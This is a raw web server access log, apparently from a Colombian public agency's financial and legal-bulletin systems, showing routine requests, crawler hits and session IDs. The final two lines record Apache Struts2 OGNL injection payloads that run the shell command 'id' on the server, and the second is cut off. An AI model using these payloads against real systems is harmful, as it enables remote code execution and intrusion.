186.98.65.195 - - [07/Feb/2024:00:36:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 31741
186.98.65.195 - - [07/Feb/2024:00:36:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12992
186.98.65.195 - - [07/Feb/2024:00:36:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 145713
186.98.65.195 - - [07/Feb/2024:00:36:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:00:36:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.98.65.195 - - [07/Feb/2024:00:36:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 9389
186.98.65.195 - - [07/Feb/2024:00:36:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34193
186.98.65.195 - - [07/Feb/2024:00:36:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:36:58 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
186.98.65.195 - - [07/Feb/2024:00:36:58 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
186.98.65.195 - - [07/Feb/2024:00:36:58 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
186.98.65.195 - - [07/Feb/2024:00:36:58 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 22821
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:37:02 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:00:37:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:37:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:00:38:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
34.41.28.3 - - [07/Feb/2024:00:38:52 -0500] "GET /galeria/galeria/fotos/Humedal-techo1P.jpg HTTP/1.1" 200 33428
201.245.192.253 - - [07/Feb/2024:00:39:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:39:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40046
201.245.192.253 - - [07/Feb/2024:00:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34763
201.245.192.253 - - [07/Feb/2024:00:40:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36624
186.98.65.195 - - [07/Feb/2024:00:40:18 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:18 -0500] "POST /sipse/faces/presentacion/sistema/reporte/ventanaVerReporteParametros.xhtml HTTP/1.1" 200 67134
186.98.65.195 - - [07/Feb/2024:00:40:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
186.98.65.195 - - [07/Feb/2024:00:40:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 156310
186.98.65.195 - - [07/Feb/2024:00:40:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:00:40:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5574
216.245.221.92 - - [07/Feb/2024:00:40:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:00:40:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:41:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34763
216.244.66.195 - - [07/Feb/2024:00:41:15 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:39:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:00:41:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.225 - - [07/Feb/2024:00:42:06 -0500] "GET /Publicaciones/2023EE310577.pdf HTTP/1.1" 404 228
172.22.2.4 - - [07/Feb/2024:00:40:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
201.245.192.253 - - [07/Feb/2024:00:42:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:42:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:00:43:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
35.203.210.211 - - [07/Feb/2024:00:44:00 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Feb/2024:00:44:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.79.225 - - [07/Feb/2024:00:45:10 -0500] "GET /resoluciones/RESOLUCIONES%202009/0410.pdf HTTP/1.1" 404 1018
216.245.221.92 - - [07/Feb/2024:00:45:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:00:45:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:46:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
185.180.143.190 - - [07/Feb/2024:00:46:52 -0500] "GET / HTTP/1.1" 200 319
185.180.143.190 - - [07/Feb/2024:00:46:52 -0500] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:45:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Feb/2024:00:47:23 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [07/Feb/2024:00:47:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:00:46:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61047
201.245.192.253 - - [07/Feb/2024:00:47:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
201.245.192.253 - - [07/Feb/2024:00:48:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:49:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [07/Feb/2024:00:50:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Feb/2024:00:50:36 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:37 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:38 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [07/Feb/2024:00:50:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
66.249.79.238 - - [07/Feb/2024:00:50:39 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5864.pdf HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:00:50:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.170 - - [07/Feb/2024:00:51:16 -0500] "GET /Publicaciones/2023EE205032.pdf HTTP/1.1" 404 228
201.245.192.253 - - [07/Feb/2024:00:51:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [07/Feb/2024:00:52:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:00:51:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Feb/2024:00:52:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37396
186.102.15.186 - - [07/Feb/2024:00:53:39 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.15.186 - - [07/Feb/2024:00:53:40 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
172.22.2.4 - - [07/Feb/2024:00:52:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58684
201.245.192.253 - - [07/Feb/2024:00:53:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d629257b7236c7411e84d9b4a8aba690a2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.102.15.186 - - [07/Feb/2024:00:53:58 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18J9NsGG5tSBly0OYhgF3Zd/40xon5HjM32LyLGM1eLcOFeZpexPWqHLNVvto62Ls8BoqQoumNk7VzqeFC09R+75aKWU6dg+y3xbMRGeaxngzm4dH0EFrFE/hq/lZa+pelyWg4PZw5XP5J6ZWOk1KTV5cg+qS++MbKWPy73PX/96q3L4rYQbOFxDCpaTnCXphPG4SFMkyQO0HcH4dc7sTpepkV4lsNQP4tw+EUaONBXHnSsp+VukTpV68w10xYTjuwAv8omG/dhBg==&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:53:59 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:53:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/6JTyEwEAzo70KMYuqmMEzwuohkB0tRwX6HKDbhbV/f0Jj0kmbBg3+KKIm7EWtpPymMEaO5VEZenjDaOml37E7JmoDn1bqbaCmM3zE1LIT9/SewFdibAc6u9SPm26ALQTCTwbBONYmjViVUltDz52scnKHcNuhHTQ=&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:53:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18IRruYWYDi6avtNSkKXPn1dz0xt+m1aIfFStIW2C072NrN8qQ6K6zAvZBKsZiH/yhEgj41953ZNHbItlKJmxI6eAVtmmZ+g3GBjNhZ2YgwftxjmJ5bUb4xz8CVFh04u+H1eEuona69AV8WNzIU3CvFx2KMS8X46og=&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:53:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19JAZGI8NQj90QSRCsLfCKjv7M5FWwHmC76wMIM8yssGXT3XP4JqMe5f8/l+wEZzDP21AJr80rHFr1jhkohHcFCuriozbC1idAu4zfucIHJbQLyL0wXohYYNwtShHV/Q3HK5Bt6IgFVfe8s7PYYnZG5AHz0/nOVGo0=&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:54:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+UXaJuRmQG8yinYaj3iPATosO2Jf9a2Q4om5cW/eZaEq6BRCOmBdVJOCTfL9YCVWN1JSj5rXhW3rynCK46h7sf7x/+G8030hsYIunZxpUX2CFgu7z6m2cwswSzEfdM0SG3lAovOqFxNAlzjEnKFY5bg3oLmS7kbrNsJrCT8QOH1kb/glp9Y8gIni86Pfy3kANepBKWlWcuog==&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:54:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+IW3t4ZgjqPZbIET5hhhxK1pVIzM2YMAgQ61pPTkx0DrXREVEwn6atRdzjR0mIG51fvNPw/1JZONrsHBtLGhYFn88hF+yjTmu4IS/JpNbHAEEqAEfZ4FS4APJk4TMbLzGeehD8vidQWrtyOeYN7IORuYkzrinUSxin9B5boMIi+KaWU3SNzdPYacp3zUimQkFd3UzghsUu/B+y0iE1dQsEYm5Pcw/psfVDsy6AWydvm9qup0i50AmwKnHiTYeyHp0U5HqbwP5+vdZo/tIWAsvyJHh/oEQBVGS6l17NOpZ0LYT1KIOAALIbH3eYTIJiblqF7Tkg1o+rZ0zREQkLhyH4XTajJwjeUBgh3k73yyPssHpEIjoEgCeJWCtohMi1GtwP7xWEnd8yRcxOjfNmItelQoTriL+Pt5c=&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:54:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18akMrkPI5aNT8mx+b9YcBLyleJsPDzZoH6Dzt+PtGpOsNHOZt1vWESnZ39r7j7ZmBKvvpD++6FSqi/4SCk/oVEor1RmuCggzRmI+lRuTO/LYuK7Nk2YJE7p9EU3E7X3oQDsCgU0UfNU5Be/CxHwz3Qp2fHI9MYBMwGYFefvuxC5Q6dSWIvmjXpLn7vuIkojb7P4kUZ2i06pbpVKgccS0vbvjBGCssOfh8gI/xv8Q0KnWbMKvYsTeXj4ijQoCHcBmqCCH2ZZq9ssthhKcjvYqF2ws33IUNuFWT/A9s8/mxk0CyS1xkqIJaQdrFWZRlrmvz4qtcf5IzDLPAn2mY1jOdo4o7KjHOuJUgGZaQ8Hwwf4uM6w+VoXIfA&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 26
186.102.15.186 - - [07/Feb/2024:00:54:17 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX189S2qyBdDeApmQ5J3ZWuqF3vnuj41OhoOl7UsPhvpmqvruS+CxPnDnqcTyux0LO4NqbH8bYND72ZGGqFRkMWWhIhdHdXfbwWbnRG0ovnKVSNJHzpKIwnuBOgskMYx3x4tc8EKOtgt4vVoB/htDeVyJaGHQubkVFK8=&u=U2FsdGVkX1+NLgiqqqtncgmK2SiUbvYsl2ULPECKG7DmRq5lYIlF0UIbMioYJDd7&y=U2FsdGVkX19qytR4kbJ2o0W4ESHxrVw0+WPnoCrzGZzdGcTXqazz3PWiWQ++xKzW HTTP/1.1" 200 60
176.97.210.231 - - [07/Feb/2024:00:54:26 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Feb/2024:00:54:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 1018
172.22.2.4 - - [07/Feb/2024:00:55:28 -0500] "GET /BLA/boletinlegal/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2